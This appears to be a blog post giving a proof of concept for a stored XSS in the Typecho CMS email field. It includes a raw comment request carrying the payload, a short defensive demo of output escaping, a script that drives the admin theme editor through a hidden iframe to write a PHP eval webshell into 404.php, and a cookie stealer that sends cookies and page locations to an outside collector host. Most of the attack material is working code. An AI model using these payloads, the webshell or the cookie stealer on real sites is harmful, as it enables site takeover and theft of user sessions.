XSS
The vulnerability exists because the fix for the Typecho 1.2.0 XSS was incomplete. The payload quoted in the issue is below; the injection point is the Email field, whereas the 1.2.0 bug was in the URL field:
"></a><script>alert('hacked')</script>"@example.com
The local part of that address is a quoted string, which RFC 5322 permits, so the value is a syntactically valid email and survives format validation. The bug is on the output side: the validated address is written back into the page without HTML escaping, so the quotes and tags inside it break out of the attribute.
Capture the comment request and send it directly:
POST /index.php/archives/1/comment HTTP/1.1
Host: ty.la
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ty.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ty.la/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert('hacked')</script>"@example.com&url=&text=%E6%B5%8B%E8%AF%95&_=b04942bb37418474b1680405acf18a79
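To show why the payload above slips through, here is an added JavaScript example (not Typecho's code): a validator that accepts RFC 5322 quoted local parts, the same class of address that PHP's FILTER_VALIDATE_EMAIL accepts, beside a vulnerable renderer that trusts validation as if it were sanitisation and a hardened renderer that escapes on output. The regex, the renderer functions and their names are assumptions for illustration.

```javascript
// Added example, not code from the original page or from Typecho.
// The payload from the issue: a quoted-string local part followed by a real domain.
const PAYLOAD = '"></a><script>alert(\'hacked\')</script>"@example.com';

// Stand-in for a CMS email validator (assumption). Like FILTER_VALIDATE_EMAIL it accepts
// both a dot-atom local part (alice.smith) and a quoted-string local part ("anything here").
const ATOM = "[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+";
const EMAIL_RE = new RegExp(
  '^(?:' + ATOM + '(?:\\.' + ATOM + ')*' +   // dot-atom local part
  '|"(?:[^"\\\\\\r\\n]|\\\\.)*"' +            // quoted-string local part: <, >, ", ' are all legal inside
  ')@(?:[A-Za-z0-9-]+\\.)+[A-Za-z]{2,}$'
);

function isValidEmail(s) {
  return EMAIL_RE.test(s);
}

// Output encoding for an HTML text node or double-quoted attribute value.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Vulnerable: the address passed validation, so it is interpolated raw into markup.
// With PAYLOAD the first '"' closes the href, '>' closes the tag, and the script runs.
function renderAuthorVulnerable(author, mail) {
  return `<a href="mailto:${mail}">${author}</a>`;
}

// Hardened: validation decides whether the value is accepted at all;
// escaping decides how it is emitted. Both are needed, and neither replaces the other.
function renderAuthorSafe(author, mail) {
  if (!isValidEmail(mail)) {
    throw new Error('invalid email address');
  }
  return `<a href="mailto:${escapeHtml(mail)}">${escapeHtml(author)}</a>`;
}

// Crude check used to compare the two renderers: does a live <script> tag survive?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Demonstration on the constructed payload.
console.log('valid email?      ', isValidEmail(PAYLOAD));                                   // true
console.log('vulnerable output:', containsScriptTag(renderAuthorVulnerable('test', PAYLOAD))); // true
console.log('hardened output:  ', containsScriptTag(renderAuthorSafe('test', PAYLOAD)));       // false
```

The point a practitioner should take from this is that tightening the email regex is the wrong fix: the quoted-string form is standard and a stricter pattern would reject legitimate addresses while still leaving every other comment field exposed. Escaping at the point where the value enters HTML closes the hole regardless of what validation accepted.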
RCE
"></a><script/src=http://url/1.js></script>"@example.com
js 文件内容如下,脚本来源 https://github.com/typecho/typecho/issues/1545,主要是通过定义一个隐藏的 iframe
来操作 Typecho 内置的 编辑当前外观
功能来实现写入操作
// Append a hidden iframe that loads the theme editor for default/404.php.
// The iframe is same-origin, so the admin's session cookie is sent with it,
// and poc() runs each time the editor page finishes loading.
function step1() {
    var data2 = '<iframe id="testxss" src="/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>';
    var oldata = document.body.innerHTML;
    document.body.innerHTML = oldata + data2;
}

var times = 0;
var g_shell = 0;

function poc() {
    // Saving submits the editor form, which reloads the iframe and fires onload
    // again; the counter stops the script after a bounded number of writes.
    if (times <= 10) {
        // The editor's textarea and buttons, reached through the iframe's DOM.
        var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content");
        var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button");
        // Prepend the one-line webshell to the existing file contents, then click
        // the save button (the original assumes it is the second <button> on the page).
        var olddatas = htmldata.innerText;
        htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas;
        btn[1].click();
        times += 1;
        // g_shell is never set to 1 anywhere in the original script, so this
        // request to the written file never fires; kept as in the issue.
        if (g_shell == 1) {
            var xhr1 = new XMLHttpRequest();
            xhr1.open("get", "/usr/themes/default/404.php?shell=1");
            xhr1.send();
        } else {
            return 0;
        }
    }
}

step1();
Requesting the theme file afterwards confirms that the one-line webshell has been written into 404.php.
Cookie-stealing script:
var website="http://xss.xxx.com";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
1 comment
Bro, how did you build the online-visitor counter in your right sidebar?